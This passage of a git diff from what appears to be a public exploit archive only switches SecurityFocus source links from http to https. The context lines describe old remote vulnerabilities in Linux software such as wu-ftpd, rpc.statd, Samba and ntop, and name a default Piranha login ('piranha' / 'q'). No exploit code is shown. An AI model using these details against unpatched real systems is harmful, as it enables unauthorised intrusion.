1.2pre1, 1.2pre3 and 1.2pre3 is a remotely exploitable buffer overflow, the result of a sprintf() in the log_xfer() routine in src/log.c. The vulnerability in 1.2pre4 is a mkdir overflow. The name of the created path can not exceed 255 chars. diff --git a/exploits/linux/remote/19503.txt b/exploits/linux/remote/19503.txt index 33a07a0a6..46ff910d1 100644 --- a/exploits/linux/remote/19503.txt +++ b/exploits/linux/remote/19503.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/650/info +source: https://www.securityfocus.com/bid/650/info Lack of user input validation in ProFTPD can lead to a remote root vulnerability. diff --git a/exploits/linux/remote/19522.txt b/exploits/linux/remote/19522.txt index d88120527..3562eafd7 100644 --- a/exploits/linux/remote/19522.txt +++ b/exploits/linux/remote/19522.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/670/info +source: https://www.securityfocus.com/bid/670/info A vulnerability in the Linux kernel allows remote users to guess the initial sequence number of TCP sessions. This can be used to create spoofed TCP sessions bypassing some types of IP based access controls. diff --git a/exploits/linux/remote/19557.txt b/exploits/linux/remote/19557.txt index 5c6e99a18..bb1b5cea8 100644 --- a/exploits/linux/remote/19557.txt +++ b/exploits/linux/remote/19557.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/719/info +source: https://www.securityfocus.com/bid/719/info AnyForm is a popular form CGI designed to support simple forms that deliver responses via email. Certain versions of AnyForm did not perform user supplied data sanity checking and could be exploited by remote intruders to execute arbitrary commands. These commands were issued as the UID which the web server runs as, typically 'nobody'. diff --git a/exploits/linux/remote/19558.c b/exploits/linux/remote/19558.c index 1d19ec6a9..ff831f458 100644 --- a/exploits/linux/remote/19558.c +++ b/exploits/linux/remote/19558.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/720/info +// source: https://www.securityfocus.com/bid/720/info Both the Unix and WindowsNT versions of OpenLink 3.2 are vulnerable to a remotely exploitable buffer overflow attack. The problem is in their web configuration utility, and is the result of an unchecked strcpy() call. The consequence is the execution of arbitrary code on the target host (running the configuration utility) with the priviliges of the web software. diff --git a/exploits/linux/remote/19567.txt b/exploits/linux/remote/19567.txt index 089e69f63..3e5981337 100644 --- a/exploits/linux/remote/19567.txt +++ b/exploits/linux/remote/19567.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/741/info +source: https://www.securityfocus.com/bid/741/info There is a vulnerability present in certain versions of the Squid Web Proxy Cache developed by the National Science Foundation. This problem is only in effect when users of the cache are using an external authenticator. diff --git a/exploits/linux/remote/19634.c b/exploits/linux/remote/19634.c index 5d8077164..688e28dce 100644 --- a/exploits/linux/remote/19634.c +++ b/exploits/linux/remote/19634.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/808/info +// source: https://www.securityfocus.com/bid/808/info The Delegate proxy server from ElectroTechnical Laboratory has numerous (several hundred, according to the orignal poster) unchecked buffers that could be exploited to remotely compromise the server. diff --git a/exploits/linux/remote/19729.c b/exploits/linux/remote/19729.c index d9fa3c487..653282497 100644 --- a/exploits/linux/remote/19729.c +++ b/exploits/linux/remote/19729.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/948/info +// source: https://www.securityfocus.com/bid/948/info A remotely exploitable buffer-overflow vulnerability affects Qualcomm's 'qpopper' daemon. This issue allows users already in possession of a username and password for a POP account to compromise the server running the qpopper daemon. diff --git a/exploits/linux/remote/19801.c b/exploits/linux/remote/19801.c index 513563100..082436671 100644 --- a/exploits/linux/remote/19801.c +++ b/exploits/linux/remote/19801.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1046/info +// source: https://www.securityfocus.com/bid/1046/info IrcII is a well-known Internet Relay Chat (IRC) client for unix. Version 4.4-7 and possibly previous versions are known to be vulnerable to a buffer overflow condition in their direct client-to-client (DCC) chat implementation. It may be possible to execute arbitrary code on a client attempting to initiate a dcc chat. Exploitation this vulnerability could result in a remote compromise with the privileges of the user running the ircII client. diff --git a/exploits/linux/remote/19868.c b/exploits/linux/remote/19868.c index 0008dbef8..2e0fa22d3 100644 --- a/exploits/linux/remote/19868.c +++ b/exploits/linux/remote/19868.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1131/info +// source: https://www.securityfocus.com/bid/1131/info A vulnerability exists in the server portion of version 0.4 of the LCDProc package. Several remote buffer overflows exist that could allow a remote attacker to corrupt memory and execute arbitrary code. As listed in the Bugtraq posting revealing this vulnerability, overflows exist at: diff --git a/exploits/linux/remote/19879.txt b/exploits/linux/remote/19879.txt index a7a048d87..eaf41ca09 100644 --- a/exploits/linux/remote/19879.txt +++ b/exploits/linux/remote/19879.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1148/info +source: https://www.securityfocus.com/bid/1148/info A default username and password has been discovered in the Piranha virtual server and load balancing package from RedHat. Version 0.4.12 of the piranha-gui program contains a default account, piranha, with the password 'q' (no quotes). Using this username and password, in conjunction with flaws in the passwd.php3 script (also part of piranha) will allow remote users to execute arbitrary commands on the machine. diff --git a/exploits/linux/remote/19891.c b/exploits/linux/remote/19891.c index 8e7f108f0..c462a30a3 100644 --- a/exploits/linux/remote/19891.c +++ b/exploits/linux/remote/19891.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1165/info +// source: https://www.securityfocus.com/bid/1165/info A vulnerability exists in the DNS decode capabilities provided as part of the tcpdump sniffer, from LBL, as well as other sniffers, including Ethereal, by Gerald Combs. These sniffers will attempt to decode DNS request and queries. However, due to the DNS name compression scheme, it is possible to create a DNS packet such that tcpdump will be caught in an infinite loop, while trying to decompress. This will prevent the sniffer from displaying further packets. If tcpdump is being used as some part of and intrusion detection system, this could allow an intruder to evade this system. diff --git a/exploits/linux/remote/19892.txt b/exploits/linux/remote/19892.txt index e6647517a..cf76f50eb 100644 --- a/exploits/linux/remote/19892.txt +++ b/exploits/linux/remote/19892.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1165/info +source: https://www.securityfocus.com/bid/1165/info A vulnerability exists in the DNS decode capabilities provided as part of the tcpdump sniffer, from LBL, as well as other sniffers, including Ethereal, by Gerald Combs. These sniffers will attempt to decode DNS request and queries. However, due to the DNS name compression scheme, it is possible to create a DNS packet such that tcpdump will be caught in an infinite loop, while trying to decompress. This will prevent the sniffer from displaying further packets. If tcpdump is being used as some part of and intrusion detection system, this could allow an intruder to evade this system. diff --git a/exploits/linux/remote/19926.c b/exploits/linux/remote/19926.c index 6eb9d27ae..6d3077ea8 100644 --- a/exploits/linux/remote/19926.c +++ b/exploits/linux/remote/19926.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1220/info +// source: https://www.securityfocus.com/bid/1220/info Several buffer overflow vulnerabilities exist in Kerberos 5 implmenetations due to buffer overflows in the Kerberos 4 compatability code. These include MIT Kerberos 5 releases 1.0.x, 1.1 and 1.1.1, MIT Kerberos 4 patch level 10 (and, most likely, prior releases), and Cygnus KerbNet and Network Security (CNS). The main source of problems is due to a buffer overflow in the krb_rd_req() library function. This function is used by every application that supports Kerberos 4 authentication, including, but not limited to, kshrd, klogin, telnetd, ftpd, rkinitd, v4rcp and kpopd. Therefore, it is possible for a remote attacker to exploit this vulnerability and gain root access on affected machines, or obtain root level access once local. diff --git a/exploits/linux/remote/19947.c b/exploits/linux/remote/19947.c index bb02294b2..1b865e715 100644 --- a/exploits/linux/remote/19947.c +++ b/exploits/linux/remote/19947.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1233/info +// source: https://www.securityfocus.com/bid/1233/info A buffer overrun exists in the XDMCP handling code used in 'gdm', an xdm replacement, shipped as part of the GNOME desktop. By sending a maliciously crafted XDMCP message, it is possible for a remote attacker to execute arbitrary commands as root on the susceptible machine. The problem lies in the handling of the display information sent as part of an XDMCP 'FORWARD_QUERY' request. diff --git a/exploits/linux/remote/19948.c b/exploits/linux/remote/19948.c index 52598482d..838bc0794 100644 --- a/exploits/linux/remote/19948.c +++ b/exploits/linux/remote/19948.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1233/info +// source: https://www.securityfocus.com/bid/1233/info A buffer overrun exists in the XDMCP handling code used in 'gdm', an xdm replacement, shipped as part of the GNOME desktop. By sending a maliciously crafted XDMCP message, it is possible for a remote attacker to execute arbitrary commands as root on the susceptible machine. The problem lies in the handling of the display information sent as part of an XDMCP 'FORWARD_QUERY' request. diff --git a/exploits/linux/remote/19966.c b/exploits/linux/remote/19966.c index 96f1469ae..f1a487648 100644 --- a/exploits/linux/remote/19966.c +++ b/exploits/linux/remote/19966.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1252/info +// source: https://www.securityfocus.com/bid/1252/info A vulnerability exists in the MDBMS database, written by Marty Bochane. By supplying a line of sufficient length to the MDBMS server, containing machine executable code, it is possible for a remote attacker to execute arbitrary commands as the user the db is running as. diff --git a/exploits/linux/remote/19978.pl b/exploits/linux/remote/19978.pl index 19485c878..384e0c1d1 100755 --- a/exploits/linux/remote/19978.pl +++ b/exploits/linux/remote/19978.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1289/info +source: https://www.securityfocus.com/bid/1289/info A scanf overflow has been discovered in the Simple Network Time Sync daemon and client version 1.0. Currently the buffer overflow has been tested on RedHat 6.1. It may be possible to obtain root, although it appears one only has 50 characters to run code with. diff --git a/exploits/linux/remote/19983.c b/exploits/linux/remote/19983.c index 3900b168f..a708c1b2f 100644 --- a/exploits/linux/remote/19983.c +++ b/exploits/linux/remote/19983.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1297/info +// source: https://www.securityfocus.com/bid/1297/info NetWin's DMail is an alternative mail-server solution for unix and NT servers. There is a buffer overflow vulnerability in the server daemon that could allow remote attackers to execute arbitrary commands as root or cause a denial of service. The overflow occurs when a large buffer is sent to argument the ETRN command: If over 260 characters are sent, the stack is corrupted and the mailserver will crash. diff --git a/exploits/linux/remote/19998.c b/exploits/linux/remote/19998.c index bbbfa9379..f7de5ad0b 100644 --- a/exploits/linux/remote/19998.c +++ b/exploits/linux/remote/19998.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1316/info +// source: https://www.securityfocus.com/bid/1316/info innd 2.2.2 contains a remotely exploitable buffer overflow in code reached when a cancel request is sent to the "control" newsgroup, under the following condition: the cancel request contains a valid Message-ID but the From/Sender fields differ between the cancel request and the post referenced by the Message-ID. This attack only works against machines running INN with "verifycancels = true" diff --git a/exploits/linux/remote/20031.c b/exploits/linux/remote/20031.c index b3c9bcdac..8b623beec 100644 --- a/exploits/linux/remote/20031.c +++ b/exploits/linux/remote/20031.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1387/info +// source: https://www.securityfocus.com/bid/1387/info Washington University ftp daemon (wu-ftpd) is a very popular unix ftp server shipped with many distributions of Linux and other UNIX operating systems. Wu-ftpd is vulnerable to a very serious remote attack in the SITE EXEC implementation. Because of user input going directly into a format string for a *printf function, it is possible to overwrite important data, such as a return address, on the stack. When this is accomplished, the function can jump into shellcode pointed to by the overwritten eip and execute arbitrary commands as root. While exploited in a manner similar to a buffer overflow, it is actually an input validation problem. Anonymous ftp is exploitable making it even more serious as attacks can come anonymously from anywhere on the internet. diff --git a/exploits/linux/remote/20043.c b/exploits/linux/remote/20043.c index 3b4e51690..d8e3f310f 100644 --- a/exploits/linux/remote/20043.c +++ b/exploits/linux/remote/20043.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1404/info +// source: https://www.securityfocus.com/bid/1404/info Dalnet ircd is a server for a popular internet chat application, IRC (Internet Relay Chat). The implementation for one of its features, the "summon" command, has a hole which could grant an attacker remote access on the host running the server (with the privs of the server). The vulnerability is a buffer overflow (due to use of an sprintf with user input) and rather difficult to exploit. The reason for this is that the shellcode must be divided into a number of variables, one of them being the hostname (which is obtained via reverse lookup, so dns poisoning would be involved) and then reconstructed in memory and executed on the stack. Also, the "summons" command is not enabled in the ircd server by default -- it has to be defined at compile time. Nonetheless, in theory this can be exploited so patches should be applied. diff --git a/exploits/linux/remote/20060.c b/exploits/linux/remote/20060.c index 9fa8e37bf..3fc04a309 100644 --- a/exploits/linux/remote/20060.c +++ b/exploits/linux/remote/20060.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1436/info +// source: https://www.securityfocus.com/bid/1436/info BitchX IRC clients, versions 75 up to and including 1.0c16, are vulnerable to a Denial of Service and possible remote execution of code. By /invite-ing someone to a channel name containing formatting characters (%s, %n, etc) an IRC user can cause the targetted user's BitchX client to seg-fault. This is caused by the fact that bitchx passes the channel name from the invite into the logging function as its format string [which is used directly in a vsprintf], rather than as an argument to the format. This also affects the KILL command. diff --git a/exploits/linux/remote/20061.c b/exploits/linux/remote/20061.c index 54dfb2a13..39ccc28c1 100644 --- a/exploits/linux/remote/20061.c +++ b/exploits/linux/remote/20061.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1445/info +// source: https://www.securityfocus.com/bid/1445/info A vulnerability exists in the 'canna' package, as distributed with a number of free operating systems, and available for other systems. Version 3.5b2 is vulnerable. It is assumed versions prior to this are also vulnerable. By supplying an overly large username or groupname with the IR_INIT command, it is possible to trigger a remote buffer overflow condition. diff --git a/exploits/linux/remote/20075.c b/exploits/linux/remote/20075.c index d3c19678d..67642c0d6 100644 --- a/exploits/linux/remote/20075.c +++ b/exploits/linux/remote/20075.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1480/info +// source: https://www.securityfocus.com/bid/1480/info A vulnerability exists in the 'rpc.statd' program, which is part of the 'nfs-utils' package that is shipped with a number of popular Linux distributions. Because of a format-string vulnerability when calling the 'syslog()' function, a remote attacker can execute code as root. diff --git a/exploits/linux/remote/20076.c b/exploits/linux/remote/20076.c index 68a767069..dc1830ba4 100644 --- a/exploits/linux/remote/20076.c +++ b/exploits/linux/remote/20076.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1480/info +// source: https://www.securityfocus.com/bid/1480/info A vulnerability exists in the 'rpc.statd' program, which is part of the 'nfs-utils' package that is shipped with a number of popular Linux distributions. Because of a format-string vulnerability when calling the 'syslog()' function, a remote attacker can execute code as root. diff --git a/exploits/linux/remote/20077.c b/exploits/linux/remote/20077.c index 57cef3fb8..3a3525191 100644 --- a/exploits/linux/remote/20077.c +++ b/exploits/linux/remote/20077.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1480/info +// source: https://www.securityfocus.com/bid/1480/info A vulnerability exists in the 'rpc.statd' program, which is part of the 'nfs-utils' package that is shipped with a number of popular Linux distributions. Because of a format-string vulnerability when calling the 'syslog()' function, a remote attacker can execute code as root. diff --git a/exploits/linux/remote/20105.txt b/exploits/linux/remote/20105.txt index 6363cb1b7..30fde2874 100644 --- a/exploits/linux/remote/20105.txt +++ b/exploits/linux/remote/20105.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1513/info +source: https://www.securityfocus.com/bid/1513/info There is a vulnerability in the Linux pam_console module that could allow an attacker to remotely reboot the workstation or perform other actions limited to local users. If a workstation is configured to use a display manager (xdm, gdm, kdm, etc.) AND has XDMCP enabled, it is possible for a user who logs in remotely to use Xnest -query to log in on display :1, which is recognized as the system console. This vulnerability is only present if the workstation is running a graphical login manager such as gdm or kdm. diff --git a/exploits/linux/remote/20143.txt b/exploits/linux/remote/20143.txt index bf7b63167..eb4626af0 100644 --- a/exploits/linux/remote/20143.txt +++ b/exploits/linux/remote/20143.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1550/info +source: https://www.securityfocus.com/bid/1550/info ntop is a tool that shows the network usage, similar to what the popular top Unix command does. Starting ntop in web mode (with the -w parameter) starts ntop with it's own built in HTTP server, to allow remote access to the functions it provides. ntop does not properly authenticate requests and is vulnerable to a ../../ request whereby unauthorized files can be retrieved, including files which are only readable by root. diff --git a/exploits/linux/remote/20145.c b/exploits/linux/remote/20145.c index b797711fb..8b718b02b 100644 --- a/exploits/linux/remote/20145.c +++ b/exploits/linux/remote/20145.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1555/info +// source: https://www.securityfocus.com/bid/1555/info Aptis Software offers a billing / provisioning solution for ISPs called TotalBill. One component of the TotalBill package is a network service called Sysgen that listens on or around port 9998. It allows a client connectiing to it to execute any command on the host it is running on (with whatever uid the service runs as, typically root) without any authentication. If this service is not filtered, anonymous attackers can easily gain root access on the target host by remotely exploiting this naive service. Other components of TotalBill may be vulnerable also (noteably cc_queue to a buffer overflow attack) but none are confirmed. diff --git a/exploits/linux/remote/20157.c b/exploits/linux/remote/20157.c index e3e5c5573..407d70c81 100644 --- a/exploits/linux/remote/20157.c +++ b/exploits/linux/remote/20157.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1591/info +// source: https://www.securityfocus.com/bid/1591/info It is possible to either execute arbitrary code or crash a remote system running University of Minnesota's Gopher Daemon, depending on the data entered. An unchecked buffer exists in the 'halidate' function of Gopherd, where the 512 byte buffer can be overwritten with approximately 600 bytes of data. diff --git a/exploits/linux/remote/20159.c b/exploits/linux/remote/20159.c index 5afce9502..3be52a7a2 100644 --- a/exploits/linux/remote/20159.c +++ b/exploits/linux/remote/20159.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1598/info +// source: https://www.securityfocus.com/bid/1598/info Darxite 0.4 does not do proper bounds checking on user-supplied data during the login process, relying on sprintf() to deliver the data into a 256 character buffer. Therefore, it is possible for an attacker to supply arbitrary code for execution at the privilege level of the Darxite user. diff --git a/exploits/linux/remote/20161.txt b/exploits/linux/remote/20161.txt index 7bcaef6fa..cb90610e8 100644 --- a/exploits/linux/remote/20161.txt +++ b/exploits/linux/remote/20161.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1601/info +source: https://www.securityfocus.com/bid/1601/info A vulnerability exists in versions 1.4.2 and earlier of the X-Chat IRC client. By supplying commands enclosed in backticks (``) in URL's sent to X-Chat, it is possible to execute arbitrary commands should the X-Chat user decide to view the link by clicking on it. This is due to the manner in which X-Chat launches pages for viewing. diff --git a/exploits/linux/remote/20210.txt b/exploits/linux/remote/20210.txt index f9e50da00..ac83a65d3 100644 --- a/exploits/linux/remote/20210.txt +++ b/exploits/linux/remote/20210.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1656/info +source: https://www.securityfocus.com/bid/1656/info WebDAV (Web Distributed Authoring and Versioning) is an extension of HTTP which allows users to create, edit and share documents using the HTTP protocol. A particular REQUEST METHOD, PROPFIND, allows users to retrieve resource properties such as displayname, date last modified, and others. Apache web server as installed by SuSE 6.4 has WebDAV enabled for the entire file structure of the server. By making a specific, properly structured request to the Apache web server, it is possible to obtain information which is equivalent to a directory listing. diff --git a/exploits/linux/remote/20220.txt b/exploits/linux/remote/20220.txt index 43ad02a9d..b17c2c033 100644 --- a/exploits/linux/remote/20220.txt +++ b/exploits/linux/remote/20220.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1678/info +source: https://www.securityfocus.com/bid/1678/info The default configuration files for versions of mod_perl shipped with Mandrake Linux 6.1 through 7.1 contain a misconfiguration that can be a security concern in some situations. The /perl directory is part of the webserver's root tree (the subdirectory tree from which files are accessable on the webserver..) that is used to store perl scripts. In the configuration file for mod_perl, the apache perl interpreter module, the directory is permitted to be "indexed".. meaning that the webserver will display the contents of the directory if it is requested by itself. The result is that an attacker can see what files are in /perl. While this bug does not affect how the webserver interprets the files in that directory (eg., it will still execute them), knowing what is there to be executed can allow for more targeted and intelligent attacks against scripts known to be vulnerable listed there. diff --git a/exploits/linux/remote/20236.txt b/exploits/linux/remote/20236.txt index a95bba65c..72a4cef32 100644 --- a/exploits/linux/remote/20236.txt +++ b/exploits/linux/remote/20236.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1707/info +source: https://www.securityfocus.com/bid/1707/info By submitting a specific url to the web server ("http://hosts.any/doc/packages/") , any user from any host may obtain a list of packages installed on a S.u.S.E 6.3 or 6.4 system. This problem is due to a configuration in the Apache httpd.conf supplied with S.u.S.E that permits anyone to request documents from this webroot subdirectory. The end result is that attackers will know what packages the victim has installed, which can assist in executing more complicated attacks. diff --git a/exploits/linux/remote/20237.c b/exploits/linux/remote/20237.c index 728d32309..99565e84a 100644 --- a/exploits/linux/remote/20237.c +++ b/exploits/linux/remote/20237.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1709/info +// source: https://www.securityfocus.com/bid/1709/info A buffer overflow vulnerability exists in the popular mail client Pine 4.21 (and possibly earlier versions), relating to the function which regularly checks for incoming email. In standard e-mail message headers is a field that holds the name and address of the sender. It typically looks like and is presented in pine like this: diff --git a/exploits/linux/remote/20246.txt b/exploits/linux/remote/20246.txt index bde14e557..310375709 100644 --- a/exploits/linux/remote/20246.txt +++ b/exploits/linux/remote/20246.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1725/info +source: https://www.securityfocus.com/bid/1725/info Web+ is a development language for use in creating web-based client/server applications. diff --git a/exploits/linux/remote/20253.sh b/exploits/linux/remote/20253.sh index 58dbf05ed..35a4cdf6f 100755 --- a/exploits/linux/remote/20253.sh +++ b/exploits/linux/remote/20253.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1742/info +source: https://www.securityfocus.com/bid/1742/info A vulnerability exists in the 1.2.x releases of scp which, if properly exploited using a modified scp binary on the server end, can permit the remote server to spoof local pathnames and overwrite files belonging to the local user. diff --git a/exploits/linux/remote/20293.pl b/exploits/linux/remote/20293.pl index 171962bbf..ca44ea18e 100755 --- a/exploits/linux/remote/20293.pl +++ b/exploits/linux/remote/20293.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1804/info +source: https://www.securityfocus.com/bid/1804/info Curl is an open-source utility for sending or receiving files using URL syntax. A vulnerability exists in the version of curl included with Debian GNU/Linux 2.2 and FreeBSD (prior to 4.2 release). diff --git a/exploits/linux/remote/20308.c b/exploits/linux/remote/20308.c index c6bb32cd7..76290e444 100644 --- a/exploits/linux/remote/20308.c +++ b/exploits/linux/remote/20308.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1816/info +// source: https://www.securityfocus.com/bid/1816/info Samba is an open source software suite that provides seamless file and print services to SMB/CIFS clients. Certain older versions of Samba had a remotely exploitable buffer overflow vulnerability. This vulnerability was in the password function of the authentication mechanism which is to say a user could supply an overly long password to the Samba server and trigger a buffer overflow. diff --git a/exploits/linux/remote/20496.c b/exploits/linux/remote/20496.c index 57dd02881..e1a9fe94a 100644 --- a/exploits/linux/remote/20496.c +++ b/exploits/linux/remote/20496.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2099/info +// source: https://www.securityfocus.com/bid/2099/info Oops is a freely available proxy server package, written by Igor Khasilev. A problem exists in the package which could allow for the arbitrary execution of code. diff --git a/exploits/linux/remote/20569.c b/exploits/linux/remote/20569.c index 205a4e25c..4add2a298 100644 --- a/exploits/linux/remote/20569.c +++ b/exploits/linux/remote/20569.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2254/info +// source: https://www.securityfocus.com/bid/2254/info micq is a chat program for Linux systems. diff --git a/exploits/linux/remote/20597.txt b/exploits/linux/remote/20597.txt index 9882cfcc4..26fc861b2 100644 --- a/exploits/linux/remote/20597.txt +++ b/exploits/linux/remote/20597.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2310/info +source: https://www.securityfocus.com/bid/2310/info Majordomo is a perl-based Internet e-mail list server. Versions prior to 1.91 are vulnerable to an attack whereby specially crafted e-mail headers are incorrectly processed, yielding the ability to execute arbitrary commands with the privileges of Majordomo. This is possible only when "advertise" or "noadvertise" directives are specified in the configuration files. diff --git a/exploits/linux/remote/20619.c b/exploits/linux/remote/20619.c index 298a26c31..c3f1fd31b 100644 --- a/exploits/linux/remote/20619.c +++ b/exploits/linux/remote/20619.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2352/info +// source: https://www.securityfocus.com/bid/2352/info Linuxconf is a Linux configuration utility from Solucorp. diff --git a/exploits/linux/remote/20622.c b/exploits/linux/remote/20622.c index cb6ab9b4c..dcff597e2 100644 --- a/exploits/linux/remote/20622.c +++ b/exploits/linux/remote/20622.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2360/info +// source: https://www.securityfocus.com/bid/2360/info Versions of CTRLServer are vulnerable to malicious user-supplied input. A failure to properly bounds-check data passed to the cfgfileget() command leads to an overflow, which, properly exploited, can result in remote execution of malicious code with root privilege. diff --git a/exploits/linux/remote/20636.txt b/exploits/linux/remote/20636.txt index 385d35950..16fcc6a21 100644 --- a/exploits/linux/remote/20636.txt +++ b/exploits/linux/remote/20636.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2385/info +source: https://www.securityfocus.com/bid/2385/info It is possible for a remote user to gain read access to directories and files outside the root directory of ES.One. Requesting a specially crafted URL by way of 'store.cgi', composed of '/../' sequences and appended with '%00' will disclose an arbitrary directory. diff --git a/exploits/linux/remote/20690.sh b/exploits/linux/remote/20690.sh index 35ed4cd2d..f30147b72 100755 --- a/exploits/linux/remote/20690.sh +++ b/exploits/linux/remote/20690.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2496/info +source: https://www.securityfocus.com/bid/2496/info Many FTP servers are vulnerable to a denial of service condition resulting from poor globbing algorithms and user resource usage limits. diff --git a/exploits/linux/remote/20727.c b/exploits/linux/remote/20727.c index 36f4d832e..6bac778f2 100644 --- a/exploits/linux/remote/20727.c +++ b/exploits/linux/remote/20727.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2540/info +// source: https://www.securityfocus.com/bid/2540/info NTP, the Network Time Protocol, is used to synchronize the time between a computer and another system or time reference. It uses UDP as a transport protocol. There are two protocol versions in use: NTP v3 and NTP v4. The 'ntpd' daemon implementing version 3 is called 'xntp3'; the version implementing version 4 is called 'ntp'. diff --git a/exploits/linux/remote/20748.pl b/exploits/linux/remote/20748.pl index 594605565..0f09fcb11 100755 --- a/exploits/linux/remote/20748.pl +++ b/exploits/linux/remote/20748.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2576/info +source: https://www.securityfocus.com/bid/2576/info A format string bug in the logging facility of the cfingerd "Configurable Finger Daemon" allows remote users to attain root privileges and execute arbitrary code. diff --git a/exploits/linux/remote/20749.c b/exploits/linux/remote/20749.c index 1773d92a9..4ccf01773 100644 --- a/exploits/linux/remote/20749.c +++ b/exploits/linux/remote/20749.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2576/info +// source: https://www.securityfocus.com/bid/2576/info A format string bug in the logging facility of the cfingerd "Configurable Finger Daemon" allows remote users to attain root privileges and execute arbitrary code. diff --git a/exploits/linux/remote/20765.pl b/exploits/linux/remote/20765.pl index 5551b3983..71d189a30 100755 --- a/exploits/linux/remote/20765.pl +++ b/exploits/linux/remote/20765.pl @@ -1,4 +1,4 @@ -# source: http://www.securityfocus.com/bid/2602/info +# source: https://www.securityfocus.com/bid/2602/info # # The Linux kernel includes a built-in firewall implementation called IPTables. IPTables supports stateful inspection of several application protocols, one of which is FTP. The inspection is used to facilitate outgoing PORT connections for FTP data transfers when clients or servers are behind firewalls. # diff --git a/exploits/linux/remote/20902.c b/exploits/linux/remote/20902.c index a3134d6c9..702901c73 100644 --- a/exploits/linux/remote/20902.c +++ b/exploits/linux/remote/20902.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2831/info +// source: https://www.securityfocus.com/bid/2831/info TIAtunnel is a freely available IRC session bouncing software package. It is distributed by the pkcrew. diff --git a/exploits/linux/remote/20908.c b/exploits/linux/remote/20908.c index 38bf3018a..4dfb71650 100644 --- a/exploits/linux/remote/20908.c +++ b/exploits/linux/remote/20908.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2840/info +// source: https://www.securityfocus.com/bid/2840/info The possibility for a buffer overflow condition exists in the xinetd daemon. diff --git a/exploits/linux/remote/20924.txt b/exploits/linux/remote/20924.txt index d02d47f9d..650dc547a 100644 --- a/exploits/linux/remote/20924.txt +++ b/exploits/linux/remote/20924.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2867/info +source: https://www.securityfocus.com/bid/2867/info MDBMS is a free relational database management system. diff --git a/exploits/linux/remote/20929.c b/exploits/linux/remote/20929.c index b3a71bdb6..78e16a810 100644 --- a/exploits/linux/remote/20929.c +++ b/exploits/linux/remote/20929.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2879/info +// source: https://www.securityfocus.com/bid/2879/info ghttpd is a freely available, open source web server for Unix systems. ghttpd supports CGI and is easy to configure and use. diff --git a/exploits/linux/remote/20936.c b/exploits/linux/remote/20936.c index 9f3eb16e7..d71ad97e1 100644 --- a/exploits/linux/remote/20936.c +++ b/exploits/linux/remote/20936.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2885/info +// source: https://www.securityfocus.com/bid/2885/info NetSQL is an implementation of a database and toolset distributed by Munica Corporation. NetSQL is part of 5 piece software package called the Webpak, containing utilities for features such as web boards, membership, and online calendars. diff --git a/exploits/linux/remote/20953.c b/exploits/linux/remote/20953.c index 519d34b68..8cad9baeb 100644 --- a/exploits/linux/remote/20953.c +++ b/exploits/linux/remote/20953.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2908/info +// source: https://www.securityfocus.com/bid/2908/info eXtremail is a freeware SMTP server available for Linux and AIX. diff --git a/exploits/linux/remote/20954.pl b/exploits/linux/remote/20954.pl index 